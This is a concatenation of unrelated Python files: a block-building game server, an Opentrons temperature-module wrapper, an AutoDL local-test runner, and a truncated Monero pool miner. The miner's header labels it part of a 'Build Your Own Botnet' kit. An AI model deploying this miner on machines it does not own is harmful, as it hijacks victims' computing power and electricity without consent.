p, q = chunked(x), chunked(z)
rows = list(self.execute(query, dict(p=p, q=q, x=x, y=y, z=z)))
if rows:
return rows[0][0]
return self.get_default_block(x, y, z)
def next_client_id(self):
result = 1
client_ids = set(x.client_id for x in self.clients)
while result in client_ids:
result += 1
return result
def on_connect(self, client):
client.client_id = self.next_client_id()
log('CONN', client.client_id, *client.client_address)
client.players = []
self.clients.append(client)
client.send(TIME, time.time(), DAY_LENGTH)
client.send(TALK, 'Welcome to PiWorld!')
client.send(TALK, 'Type "/help" for a list of commands.')
for i in range(MAX_LOCAL_PLAYERS):
p = i + 1
player = Player('guest%d-%d' % (client.client_id, p), SPAWN_POINT, p)
client.players.append(player)
client.send(YOU, client.client_id, p, *client.players[i].position)
self.send_nick(client, p)
for i in range(MAX_LOCAL_PLAYERS):
self.send_positions(client, i + 1)
self.send_nicks(client)
self.send_options(client)
def on_data(self, client, data):
#log('RECV', client.client_id, data)
args = data.split(',')
command, args = args[0], args[1:]
if command in self.commands:
func = self.commands[command]
func(client, *args)
def on_disconnect(self, client):
log('DISC', client.client_id, *client.client_address)
self.clients.remove(client)
self.send_disconnect(client)
self.send_talk('%s has disconnected from the server.' % client.players[0].nick)
def on_version(self, client, version):
if client.version is not None:
return
version = int(version)
if version != 2:
client.stop()
print("Unmatched client version:", version)
return
client.version = version
# TODO: client.start() here
def on_authenticate(self, client, username, access_token):
user_id = None
#if username and access_token:
# payload = {
# 'username': username,
# 'access_token': access_token,
# }
# response = requests.post(AUTH_URL, data=payload)
# if response.status_code == 200 and response.text.isdigit():
# user_id = int(response.text)
client.user_id = user_id
if user_id is None:
client.nick = 'guest%d' % client.client_id
else:
client.nick = username
self.send_nick(client, 1)
# TODO: has left message if was already authenticated
self.send_talk('%s has joined the game.' % client.players[0].nick)
def on_chunk(self, client, p, q, key=0):
packets = []
p, q, key = map(int, (p, q, key))
query = (
'select rowid, x, y, z, w from block where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
max_rowid = 0
blocks = 0
for rowid, x, y, z, w in rows:
blocks += 1
packets.append(packet(BLOCK, p, q, x, y, z, w))
max_rowid = max(max_rowid, rowid)
query = (
'select rowid, x, y, z, w from extra where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
extras = 0
for rowid, x, y, z, w in rows:
extras += 1
packets.append(packet(EXTRA, p, q, x, y, z, w))
query = (
'select x, y, z, w from light where '
'p = :p and q = :q;'
)
rows = self.execute(query, dict(p=p, q=q))
lights = 0
for x, y, z, w in rows:
lights += 1
packets.append(packet(LIGHT, p, q, x, y, z, w))
query = (
'select rowid, x, y, z, w from shape where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
shapes = 0
for rowid, x, y, z, w in rows:
shapes += 1
packets.append(packet(SHAPE, p, q, x, y, z, w))
query = (
'select rowid, x, y, z, w from transform where '
'p = :p and q = :q and rowid > :key;'
)
rows = self.execute(query, dict(p=p, q=q, key=key))
transforms = 0
for rowid, x, y, z, w in rows:
transforms += 1
packets.append(packet(TRANSFORM, p, q, x, y, z, w))
query = (
'select x, y, z, face, text from sign where '
'p = :p and q = :q;'
)
rows = self.execute(query, dict(p=p, q=q))
signs = 0
for x, y, z, face, text in rows:
signs += 1
packets.append(packet(SIGN, p, q, x, y, z, face, text))
if blocks:
packets.append(packet(KEY, p, q, max_rowid))
if blocks or extras or lights or shapes or signs or transforms:
packets.append(packet(REDRAW, p, q))
packets.append(packet(CHUNK, p, q))
client.send_raw(''.join(packets))
def on_block(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
previous = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif w not in ALLOWED_ITEMS:
message = 'That item is not allowed.'
elif w and previous:
message = 'Cannot create blocks in a non-empty space.'
elif not w and not previous:
message = 'That space is already empty.'
elif previous in INDESTRUCTIBLE_ITEMS:
message = 'Cannot destroy that type of block.'
if message is not None:
client.send(BLOCK, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert into block_history (timestamp, user_id, x, y, z, w) '
'values (:timestamp, :user_id, :x, :y, :z, :w);'
)
if RECORD_HISTORY:
self.execute(query, dict(timestamp=time.time(),
user_id=client.user_id, x=x, y=y, z=z, w=w))
query = (
'insert or replace into block (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_block(client, p, q, x, y, z, w)
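# Mirror boundary blocks into each adjacent chunk's rows with a negated type
# (-w), so a client holding only the neighbouring chunk still learns about
# this edge block. Interior blocks skip the whole loop below, since
# chunked(x + dx) and chunked(z + dz) then stay equal to p and q.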
for dx in (-1, 0, 1):
for dz in (-1, 0, 1):
if dx == 0 and dz == 0:
continue
if dx and chunked(x + dx) == p:
continue
if dz and chunked(z + dz) == q:
continue
np, nq = p + dx, q + dz
self.execute(query, dict(p=np, q=nq, x=x, y=y, z=z, w=-w))
self.send_block(client, np, nq, x, y, z, -w)
if w == 0:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update extra set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update light set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update shape set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
query = (
'update transform set w = 0 where '
'x = :x and y = :y and z = :z;'
)
self.execute(query, dict(x=x, y=y, z=z))
def on_extra(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif block == 0:
message = 'Extras must be placed on a block.'
if message is not None:
# TODO: client.send(EXTRA, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into extra (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_extra(client, p, q, x, y, z, w)
def on_light(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif block == 0:
message = 'Lights must be placed on a block.'
elif w < 0 or w > 15:
message = 'Invalid light value.'
if message is not None:
# TODO: client.send(LIGHT, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into light (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_light(client, p, q, x, y, z, w)
def on_shape(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif block == 0:
message = 'Shape must be placed on a block.'
if message is not None:
# TODO: client.send(SHAPE, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into shape (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_shape(client, p, q, x, y, z, w)
def on_transform(self, client, x, y, z, w):
x, y, z, w = map(int, (x, y, z, w))
p, q = chunked(x), chunked(z)
block = self.get_block(x, y, z)
message = None
if AUTH_REQUIRED and client.user_id is None:
message = 'Only logged in users are allowed to build.'
elif y <= 0 or y > 255:
message = 'Invalid block coordinates.'
elif block == 0:
message = 'Transform must be placed on a block.'
if message is not None:
# TODO: client.send(TRANSFORM, p, q, x, y, z, previous)
client.send(REDRAW, p, q)
client.send(TALK, message)
return
query = (
'insert or replace into transform (p, q, x, y, z, w) '
'values (:p, :q, :x, :y, :z, :w);'
)
self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
self.send_transform(client, p, q, x, y, z, w)
def on_sign(self, client, x, y, z, face, *args):
if AUTH_REQUIRED and client.user_id is None:
client.send(TALK, 'Only logged in users are allowed to build.')
return
text = ','.join(args)
x, y, z, face = map(int, (x, y, z, face))
if y <= 0 or y > 255:
return
if face < 0 or face > 7:
return
if len(text) > MAX_SIGN_LENGTH:
text = text[:MAX_SIGN_LENGTH-1]
print("Truncating long sign text.")
p, q = chunked(x), chunked(z)
if text:
query = (
'insert or replace into sign (p, q, x, y, z, face, text) '
'values (:p, :q, :x, :y, :z, :face, :text);'
)
self.execute(query,
dict(p=p, q=q, x=x, y=y, z=z, face=face, text=text))
else:
query = (
'delete from sign where '
'x = :x and y = :y and z = :z and face = :face;'
)
self.execute(query, dict(x=x, y=y, z=z, face=face))
self.send_sign(client, p, q, x, y, z, face, text)
def on_position(self, client, player, x, y, z, rx, ry):
player = int(player)
x, y, z, rx, ry = map(float, (x, y, z, rx, ry))
client.players[player - 1].position = (x, y, z, rx, ry)
self.send_position(client, player)
def on_add(self, client, player):
player = int(player)
client.players[player - 1].is_active = True
self.send_add(client, player)
def on_remove(self, client, player):
player = int(player)
client.players[player - 1].is_active = False
self.send_remove(client, player)
def on_talk(self, client, *args):
text = ','.join(args)
if text.startswith('/'):
for pattern, func in self.patterns:
match = pattern.match(text)
if match:
func(client, *match.groups())
break
else:
client.send(TALK, 'Unrecognized command: "%s"' % text)
elif text.startswith('@'):
nick = text[1:].split(' ', 1)[0]
for other in self.clients:
if other.nick == nick:
client.send(TALK, '%s> %s' % (client.nick, text))
other.send(TALK, '%s> %s' % (client.nick, text))
break
else:
client.send(TALK, 'Unrecognized nick: "%s"' % nick)
else:
self.send_talk('%s> %s' % (client.nick, text))
def on_nick(self, client, player, nick=None):
player = int(player)
if AUTH_REQUIRED:
client.send(TALK, 'You cannot change your nick on this server.')
return
if nick is None:
client.send(TALK, 'Your nickname is %s' % client.players[player - 1].nick)
else:
self.send_talk('%s is now known as %s' % (client.players[player - 1].nick, nick))
client.players[player - 1].nick = nick
self.send_nick(client, player)
def on_spawn(self, client, player):
player = int(player)
client.players[player - 1].position = SPAWN_POINT
client.send(YOU, client.client_id, player, *client.players[player - 1].position)
self.send_position(client, player)
def on_goto(self, client, player, nick=None):
player = int(player)
if nick in (None, ""):
clients = [x for x in self.clients if (x != client and len(x.active_players()) > 0)]
if len(client.active_players()) > 1:
# Include own client if > 1 active players
clients.append(client)
other = random.choice(clients) if clients else None
active_players = other.active_players() if other else []
other_player = random.choice(active_players) if active_players else None
else:
nicks = {}
for c in self.clients:
nicks.update(dict((p.nick, (c, p)) for p in c.players))
other, other_player = nicks.get(nick, (None, None))
if other and other_player:
client.players[player - 1].position = other_player.position
client.send(YOU, client.client_id, player, *client.players[player - 1].position)
self.send_position(client, player)
def on_pq(self, client, player, p, q):
player = int(player)
p, q = map(int, (p, q))
if abs(p) > 1000 or abs(q) > 1000:
return
client.players[player - 1].position = (p * CHUNK_SIZE, 0, q * CHUNK_SIZE, 0, 0)
client.send(YOU, client.client_id, player, *client.players[player - 1].position)
self.send_position(client, player)
def on_help(self, client, topic=None):
if topic is None:
client.send(TALK, 'Type "t" to chat. Type "/" to type commands:')
client.send(TALK, '/goto [NAME], /help [TOPIC], /list, /login NAME, /logout, /nick')
client.send(TALK, '/offline [FILE], /online HOST [PORT], /pq P Q, /spawn, /view N')
return
topic = topic.lower().strip()
if topic == 'goto':
client.send(TALK, 'Help: /goto [NAME]')
client.send(TALK, 'Teleport to another user.')
client.send(TALK, 'If NAME is unspecified, a random user is chosen.')
elif topic == 'list':
client.send(TALK, 'Help: /list')
client.send(TALK, 'Display a list of connected users.')
elif topic == 'login':
client.send(TALK, 'Help: /login NAME')
client.send(TALK, 'Switch to another registered username.')
client.send(TALK, 'The login server will be re-contacted. The username is case-sensitive.')
elif topic == 'logout':
client.send(TALK, 'Help: /logout')
client.send(TALK, 'Unauthenticate and become a guest user.')
client.send(TALK, 'Automatic logins will not occur again until the /login command is re-issued.')
elif topic == 'offline':
client.send(TALK, 'Help: /offline [FILE]')
client.send(TALK, 'Switch to offline mode.')
client.send(TALK, 'FILE specifies the save file to use and defaults to "craft".')
elif topic == 'online':
client.send(TALK, 'Help: /online HOST [PORT]')
client.send(TALK, 'Connect to the specified server.')
elif topic == 'nick':
client.send(TALK, 'Help: /nick [NICK]')
client.send(TALK, 'Get or set your nickname.')
elif topic == 'pq':
client.send(TALK, 'Help: /pq P Q')
client.send(TALK, 'Teleport to the specified chunk.')
elif topic == 'spawn':
client.send(TALK, 'Help: /spawn')
client.send(TALK, 'Teleport back to the spawn point.')
elif topic == 'view':
client.send(TALK, 'Help: /view N')
client.send(TALK, 'Set viewing distance, 1 - 24.')
def on_list(self, client):
players = []
for c in self.clients:
players.extend(x.nick for x in c.active_players())
client.send(TALK, 'Players: %s' % ', '.join(players))
def on_control_callback(self, client, player, x, y, z, face):
print("Control callback: ", player, x, y, z, face)
def send_positions(self, client, player):
for other in self.clients:
other_player = other.players[player - 1]
if other == client or not(other_player.is_active):
continue
client.send(POSITION, other.client_id, player, *other_player.position)
def send_position(self, client, player):
for other in self.clients:
if other == client:
continue
other.send(POSITION, client.client_id, player, *client.players[player - 1].position)
def send_add(self, client, player):
for other in self.clients:
if other == client:
continue
other.send(ADD, client.client_id, player)
self.send_position(client, player)
self.send_positions(client, player)
for i in range(MAX_LOCAL_PLAYERS):
self.send_nick(client, i + 1)
self.send_nicks(client)
def send_remove(self, client, player):
for other in self.clients:
if other == client:
continue
other.send(REMOVE, client.client_id, player)
def send_nicks(self, client):
for other in self.clients:
if other == client:
continue
for i in range(MAX_LOCAL_PLAYERS):
client.send(NICK, other.client_id, i+1, other.players[i].nick)
def send_options(self, client):
query = (
'select name, value from option;'
)
rows = list(self.execute(query))
for name, value in rows:
client.send(OPTION, name, value)
if worldgen:
client.send(OPTION, "worldgen", worldgen)
def send_nick(self, client, player_index):
for other in self.clients:
other.send(NICK, client.client_id, player_index,
client.players[player_index - 1].nick)
def send_disconnect(self, client):
for other in self.clients:
if other == client:
continue
other.send(DISCONNECT, client.client_id)
def send_block(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(BLOCK, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_extra(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(EXTRA, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_light(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(LIGHT, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_shape(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(SHAPE, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_transform(self, client, p, q, x, y, z, w):
for other in self.clients:
if other == client:
continue
other.send(TRANSFORM, p, q, x, y, z, w)
other.send(REDRAW, p, q)
def send_sign(self, client, p, q, x, y, z, face, text):
for other in self.clients:
if other == client:
continue
other.send(SIGN, p, q, x, y, z, face, text)
other.send(REDRAW, p, q)
def send_talk(self, text):
log(text)
for client in self.clients:
client.send(TALK, text)
def cleanup():
world = World(None)
conn = sqlite3.connect(DB_PATH)
query = 'select x, y, z from block order by rowid desc limit 1;'
last = list(conn.execute(query))[0]
query = 'select distinct p, q from block;'
chunks = list(conn.execute(query))
count = 0
total = 0
delete_query = 'delete from block where x = %d and y = %d and z = %d;'
print('begin;')
for p, q in chunks:
chunk = world.create_chunk(p, q)
query = 'select x, y, z, w from block where p = :p and q = :q;'
rows = conn.execute(query, {'p': p, 'q': q})
for x, y, z, w in rows:
if chunked(x) != p or chunked(z) != q:
continue
total += 1
if (x, y, z) == last:
continue
original = chunk.get((x, y, z), 0)
if w == original or original in INDESTRUCTIBLE_ITEMS:
count += 1
print(delete_query % (x, y, z))
conn.close()
print('commit;')
print >> sys.stderr, '%d of %d blocks will be cleaned up' % (count, total)
def close_server(server):
print("\nPlease wait for server to close (upto 5 seconds)...")
server.server_close()
server.model.finish()
server.model.thread.join()
def main():
if len(sys.argv) == 2 and sys.argv[1] == 'cleanup':
cleanup()
return
host, port = DEFAULT_HOST, DEFAULT_PORT
if '--worldgen' in sys.argv:
global worldgen
i = sys.argv.index('--worldgen')
worldgen_value = sys.argv[i+1]
worldgen = worldgen_value
del sys.argv[i+1]
del sys.argv[i]
if len(sys.argv) > 1:
host = sys.argv[1]
if len(sys.argv) > 2:
port = int(sys.argv[2])
log('SERV', host, port)
model = Model(None)
model.start()
server = Server((host, port), Handler)
server.model = model
atexit.register(close_server, server)
server.serve_forever()
if __name__ == '__main__':
main()
|
tempdeck.py | from threading import Thread, Event
from opentrons.drivers.temp_deck import TempDeck as TempDeckDriver
from opentrons.drivers.temp_deck.driver import temp_locks
from opentrons import commands
TEMP_POLL_INTERVAL_SECS = 1
class MissingDevicePortError(Exception):
pass
# TODO: BC 2018-08-03 this class shares a fair amount verbatim from MagDeck,
# there should be an upstream ABC in the future to contain shared logic
# between modules
class TempDeck(commands.CommandPublisher):
"""
Under development. API subject to change without a version bump
"""
def __init__(self, lw=None, port=None, broker=None):
super().__init__(broker)
self.labware = lw
self._port = port
self._driver = None
self._device_info = None
self._poll_stop_event = None
@commands.publish.both(command=commands.tempdeck_set_temp)
def set_temperature(self, celsius):
"""
Set temperature in degree Celsius
Range: 4 to 95 degree Celsius (QA tested).
The internal temp range is -9 to 99 C, which is limited by the 2-digit
temperature display. Any input outside of this range will be clipped
to the nearest limit
"""
if self._driver and self._driver.is_connected():
self._driver.legacy_set_temperature(celsius)
@commands.publish.both(command=commands.tempdeck_deactivate)
def deactivate(self):
""" Stop heating/cooling and turn off the fan """
if self._driver and self._driver.is_connected():
self._driver.deactivate()
def wait_for_temp(self):
"""
This method returns only once the set temperature has been reached. Subject to change.
"""
if self._driver and self._driver.is_connected():
while self.status != 'holding at target':
pass
@classmethod
def name(cls):
return 'tempdeck'
@classmethod
def display_name(cls):
return 'Temperature Deck'
# TODO: there should be a separate decoupled set of classes that construct
# the http api response entity given the model instance.
def to_dict(self):
return {
'name': self.name(),
'port': self.port,
'serial': self.device_info and self.device_info.get('serial'),
'model': self.device_info and self.device_info.get('model'),
'fwVersion': self.device_info and self.device_info.get('version'),
'displayName': self.display_name(),
**self.live_data
}
@property
def live_data(self):
return {
'status': self.status,
'data': {
'currentTemp': self.temperature,
'targetTemp': self.target
}
}
@property
def port(self):
""" Serial Port """
return self._port
@property
def device_info(self):
"""
Returns a dict:
{ 'serial': 'abc123', 'model': '8675309', 'version': '9001' }
"""
return self._device_info
@property
def temperature(self):
""" Current temperature in degree celsius """
return self._driver.temperature
@property
def target(self):
"""
Target temperature in degree celsius.
Returns None if no target set
"""
return self._driver.target
@property
def status(self):
"""
Returns a string: 'heating'/'cooling'/'holding at target'/'idle'.
NOTE: Depends on _poll_temperature thread to update the temperature to
be used to determine the status
"""
return self._driver and self._driver.status
# Internal Methods
def _poll_temperature(self):
while not self._poll_stop_event.wait(TEMP_POLL_INTERVAL_SECS):
self._driver and self._driver.update_temperature()
def connect(self):
"""
Connect to the 'TempDeck' port
Planned change- will connect to the correct port in case of multiple
TempDecks
"""
if self._port:
if temp_locks.get(self._port):
self._driver = temp_locks[self._port][1]
else:
self._driver = TempDeckDriver()
if not self._driver.is_connected():
self._driver.connect(self._port)
self._device_info = self._driver.get_device_info()
self._poll_stop_event = Event()
Thread(target=self._poll_temperature, daemon=True).start()
else:
# Sanity check. Should never happen, because connect should never
# be called without a port on Module
raise MissingDevicePortError(
"TempDeck couldn't connect to port {}".format(self._port)
)
def disconnect(self):
'''
Disconnect from the serial port
'''
if self._poll_stop_event:
self._poll_stop_event.set()
if self._driver:
if self.status != 'idle':
self.deactivate()
self._driver.disconnect(port=self._port)
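# A minimal usage sketch (hypothetical serial port, never called): connect,
# set a target, block until the deck reports it is holding, then shut down.
# Assumes a TempDeck is actually attached at the given port.
def _example_tempdeck_session(port='/dev/ttyACM0'):
    deck = TempDeck(port=port)
    deck.connect()            # also starts the background temperature poller
    deck.set_temperature(37)  # degrees Celsius, clipped to the -9..99 range
    deck.wait_for_temp()      # busy-waits on the polled status
    deck.deactivate()
    deck.disconnect()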
|
run_local_test.py | ################################################################################
# Name: Run Local Test Tool
# Author: Zhengying Liu
# Created on: 20 Sep 2018
# Update time: 5 May 2019
# Usage: python run_local_test.py -dataset_dir=<dataset_dir> -code_dir=<code_dir>
VERSION = "v20190505"
DESCRIPTION = \
"""This script allows participants to run local test of their method within the
downloaded starting kit folder (and avoid using submission quota on CodaLab). To
do this, run:
```
python run_local_test.py -dataset_dir=./AutoDL_sample_data/miniciao -code_dir=./AutoDL_sample_code_submission/
```
in the starting kit directory. If you want to test the performance of a
different algorithm on a different dataset, please specify them using respective
arguments.
If you want to use default folders (i.e. those in above command line), simply
run
```
python run_local_test.py
```
"""
# ALL INFORMATION, SOFTWARE, DOCUMENTATION, AND DATA ARE PROVIDED "AS-IS".
# ISABELLE GUYON, CHALEARN, AND/OR OTHER ORGANIZERS OR CODE AUTHORS DISCLAIM
# ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR ANY PARTICULAR PURPOSE, AND THE
# WARRANTY OF NON-INFRINGEMENT OF ANY THIRD PARTY'S INTELLECTUAL PROPERTY RIGHTS.
# IN NO EVENT SHALL ISABELLE GUYON AND/OR OTHER ORGANIZERS BE LIABLE FOR ANY SPECIAL,
# INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF SOFTWARE, DOCUMENTS, MATERIALS,
# PUBLICATIONS, OR INFORMATION MADE AVAILABLE FOR THE CHALLENGE.
################################################################################
# Verbosity level of logging.
# Can be: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL
verbosity_level = 'INFO'
import logging
import os
import tensorflow as tf
import time
import shutil # for deleting a whole directory
import webbrowser
from multiprocessing import Process
import argparse
logging.basicConfig(
level=getattr(logging, verbosity_level),
format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
def _HERE(*args):
h = os.path.dirname(os.path.realpath(__file__))
return os.path.join(h, *args)
def get_path_to_ingestion_program(starting_kit_dir):
return os.path.join(starting_kit_dir,
'AutoDL_ingestion_program', 'ingestion.py')
def get_path_to_scoring_program(starting_kit_dir):
return os.path.join(starting_kit_dir,
'AutoDL_scoring_program', 'score.py')
def remove_dir(output_dir):
"""Remove the directory `output_dir`.
This aims to clean existing output of last run of local test.
"""
if os.path.isdir(output_dir):
logging.info("Cleaning existing output directory of last run: {}" \
.format(output_dir))
shutil.rmtree(output_dir)
def get_basename(path):
if len(path) == 0:
return ""
if path[-1] == os.sep:
path = path[:-1]
return path.split(os.sep)[-1]
def run_baseline(dataset_dir, code_dir, time_budget=7200):
# Current directory containing this script
starting_kit_dir = os.path.dirname(os.path.realpath(__file__))
path_ingestion = get_path_to_ingestion_program(starting_kit_dir)
path_scoring = get_path_to_scoring_program(starting_kit_dir)
# Run ingestion and scoring at the same time
command_ingestion = \
"python {} --dataset_dir={} --code_dir={} --time_budget={}" \
.format(path_ingestion, dataset_dir, code_dir, time_budget)
command_scoring = \
'python {} --solution_dir={} --time_budget={}' \
.format(path_scoring, dataset_dir, time_budget)
def run_ingestion():
os.system(command_ingestion)
def run_scoring():
os.system(command_scoring)
ingestion_process = Process(name='ingestion', target=run_ingestion)
scoring_process = Process(name='scoring', target=run_scoring)
ingestion_output_dir = os.path.join(starting_kit_dir,
'AutoDL_sample_result_submission')
score_dir = os.path.join(starting_kit_dir,
'AutoDL_scoring_output')
remove_dir(ingestion_output_dir)
remove_dir(score_dir)
ingestion_process.start()
scoring_process.start()
detailed_results_page = os.path.join(starting_kit_dir,
'AutoDL_scoring_output',
'detailed_results.html')
detailed_results_page = os.path.abspath(detailed_results_page)
# Open detailed results page in a browser
time.sleep(2)
for i in range(30):
if os.path.isfile(detailed_results_page):
webbrowser.open('file://' + detailed_results_page, new=2)
break
time.sleep(1)
if __name__ == '__main__':
default_starting_kit_dir = _HERE()
# The default dataset is 'Munster' under the folder AutoDL_public_data/
default_dataset_dir = os.path.join(default_starting_kit_dir,
'AutoDL_public_data', 'Munster')
default_code_dir = os.path.join(default_starting_kit_dir,
'AutoDL_sample_code_submission')
default_time_budget = 1200
tf.flags.DEFINE_string('dataset_dir', default_dataset_dir,
"Directory containing the content (e.g. adult.data/ + "
"adult.solution) of an AutoDL dataset. Specify this "
"argument if you want to test on a different dataset.")
tf.flags.DEFINE_string('code_dir', default_code_dir,
"Directory containing a `model.py` file. Specify this "
"argument if you want to test on a different algorithm."
)
tf.flags.DEFINE_float('time_budget', default_time_budget,
"Time budget for running ingestion " +
"(training + prediction)."
)
FLAGS = tf.flags.FLAGS
dataset_dir = FLAGS.dataset_dir
code_dir = FLAGS.code_dir
time_budget = FLAGS.time_budget
logging.info("#" * 50)
logging.info("Begin running local test using")
logging.info("code_dir = {}".format(get_basename(code_dir)))
logging.info("dataset_dir = {}".format(get_basename(dataset_dir)))
logging.info("#" * 50)
run_baseline(dataset_dir, code_dir, time_budget)
# os.system(r'cp /userhome/code/autodl_starting_kit_stable/AutoDL_scoring_output/learning* /userhome/code/autodl_starting_kit_stable/result')
|
miner.py | #!/usr/bin/python
"Monero Miner (Build Your Own Botnet)"
import socket
import select
import binascii
import struct
import json
import sys
import os
import time
import threading
import subprocess
import multiprocessing
import pycryptonight
import pyrx
# main
class Miner(multiprocessing.Process):
"""
Python based Monero miner. Based off of work in: https://github.com/jtgrassie/monero-powpy
Utilizes a queue of jobs with a worker process to mine Monero.
"""
def __init__(self, url, port, user):
super(Miner, self).__init__()
self.pool_host = url
self.pool_port = port
self.pool_pass = 'xx'
self.user = user
self.q = multiprocessing.Queue()
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.proc = threading.Thread(target=self.worker)
def run(self):
pool_ip = socket.gethostbyname(self.pool_host)
self.s.connect((pool_ip, self.pool_port))
self.proc.daemon = True
self.proc.start()
login = {
'method': 'login',
'params': {
'login': self.user,
'pass': self.pool_pass,
'rigid': '',
'agent': 'stratum-miner-py/0.1'
},
'id':1
}
#print('Logging into pool: {}:{}'.format(self.pool_host, self.pool_port))
self.s.sendall(str(json.dumps(login)+'\n').encode('utf-8'))
        login_id = ''  # set once the login result arrives
        try:
            while 1:
line = self.s.makefile().readline()
r = json.loads(line)
error = r.get('error')
result = r.get('result')
method = r.get('method')
params = r.get('params')
#if error:
#print('Error: {}'.format(error))
#continue
#if result and result.get('status'):
#print('Status: {}'.format(result.get('status')))
if result and result.get('job'):
login_id = result.get('id')
job = result.get('job')
job['login_id'] = login_id
self.q.put(job)
elif method and method == 'job' and len(login_id):
self.q.put(params)
        except KeyboardInterrupt:
            #print('{}Exiting'.format(os.linesep))
            # the worker is a daemon thread (threads have no terminate()),
            # so closing the socket and ending this process is enough
            self.s.close()
            self.terminate()
    def pack_nonce(self, blob, nonce):
        b = binascii.unhexlify(blob)
        buf = struct.pack('39B', *bytearray(b[:39]))
        buf += struct.pack('<I', nonce)  # nonce is little-endian at offset 39
        buf += struct.pack('{}B'.format(len(b)-43), *bytearray(b[43:]))
        return buf
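    # Blob layout assumed by pack_nonce (Monero hashing blob): bytes [0:39]
    # hold the header prefix, [39:43] the 4-byte little-endian nonce, and
    # [43:] the remainder. Minimal sketch with a hypothetical zero blob:
    #
    #     packed = miner.pack_nonce('00' * 45, 7)   # 45-byte blob, nonce 7
    #     assert packed[39:43] == struct.pack('<I', 7)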
    def worker(self):
        started = time.time()
        hash_count = 0
        login_id = None
while 1:
job = self.q.get()
if job.get('login_id'):
login_id = job.get('login_id')
#print('Login ID: {}'.format(login_id))
blob = job.get('blob')
target = job.get('target')
job_id = job.get('job_id')
height = job.get('height')
block_major = int(blob[:2], 16)
cnv = 0
if block_major >= 7:
cnv = block_major - 6
if cnv > 5:
seed_hash = binascii.unhexlify(job.get('seed_hash'))
#print('New job with target: {}, RandomX, height: {}'.format(target, height))
#else:
#print('New job with target: {}, CNv{}, height: {}'.format(target, cnv, height))
            target = struct.unpack('I', binascii.unhexlify(target))[0]
            if target >> 32 == 0:
                # expand a 32-bit compact target to the full 64-bit range
                target = int(0xFFFFFFFFFFFFFFFF / int(0xFFFFFFFF / target))
nonce = 1
while 1:
                buf = self.pack_nonce(blob, nonce)
                if cnv > 5:
                    hash_ = pyrx.get_rx_hash(buf, seed_hash, height)
                else:
                    hash_ = pycryptonight.cn_slow_hash(buf, cnv, 0, height)
                hash_count += 1
                # sys.stdout.write('.')
                # sys.stdout.flush()
                hex_hash = binascii.hexlify(hash_).decode()
                r64 = struct.unpack('Q', hash_[24:])[0]
if r64 < target:
elapsed = time.time() - started
hr = int(hash_count / elapsed)
#print('{}Hashrate: {} H/s'.format(os.linesep, hr))
submit = {
'method':'submit',
'params': {
'id': login_id,
'job_id': job_id,
'nonce': binascii.hexlify(struct.pack('<I', nonce)).decode(),
'result': hex_hash
},
